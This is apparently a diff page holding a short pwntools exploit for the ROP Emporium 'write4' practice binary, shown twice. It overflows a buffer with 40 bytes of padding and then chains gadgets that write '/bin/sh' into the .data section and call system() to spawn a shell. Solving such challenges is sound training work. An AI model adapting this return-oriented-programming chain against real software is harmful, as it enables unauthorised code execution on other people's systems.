Sinkmanu · May 15, 2019 12:42
diff --git a/emporium-write4.py b/emporium-write4.py
 #!/usr/bin/env python

 from pwn import *

 context(arch = 'amd64', os = 'linux')

 elf = ELF("./write4")
 p = process(elf.path)
 #p = gdb.debug("/home/manu/Challenges/write4", '''
 #break main
 #''')

 #  0x00400820             4d893e  mov qword [r14], r15
 #  0x00400823                 c3  ret

 #  0x00400890               415e  pop r14
 #  0x00400892               415f  pop r15
 #  0x00400894                 c3  ret

 #  0x00400893                 5f  pop rdi
 #  0x00400894                 c3  ret

 #   [25] .data             PROGBITS         0000000000601050  00001050
 #       0000000000000010  0000000000000000  WA       0     0     8

 pop_rdi_ret = 0x00400893
 mov_r14_r15 = 0x00400820
 pop14_pop15_ret = 0x00400890
 system = 0x4005e0
 bin_sh = "/bin/sh\x00"
 data_section_writable = 0x601050

 p.sendline("A"*40 + p64(pop14_pop15_ret) + p64(data_section_writable) + bin_sh + p64(mov_r14_r15) + p64(pop_rdi_ret) + p64(data_section_writable) + p64(system))
 p.interactive()
	#!/usr/bin/env python

	from pwn import *

	context(arch = 'amd64', os = 'linux')

	elf = ELF("./write4")
	p = process(elf.path)
	#p = gdb.debug("/home/manu/Challenges/write4", '''
	#break main
	#''')

	# 0x00400820 4d893e mov qword [r14], r15
	# 0x00400823 c3 ret

	# 0x00400890 415e pop r14
	# 0x00400892 415f pop r15
	# 0x00400894 c3 ret

	# 0x00400893 5f pop rdi
	# 0x00400894 c3 ret

	# [25] .data PROGBITS 0000000000601050 00001050
	# 0000000000000010 0000000000000000 WA 0 0 8

	pop_rdi_ret = 0x00400893
	mov_r14_r15 = 0x00400820
	pop14_pop15_ret = 0x00400890
	system = 0x4005e0
	bin_sh = "/bin/sh\x00"
	data_section_writable = 0x601050

	p.sendline("A"*40 + p64(pop14_pop15_ret) + p64(data_section_writable) + bin_sh + p64(mov_r14_r15) + p64(pop_rdi_ret) + p64(data_section_writable) + p64(system))
	p.interactive()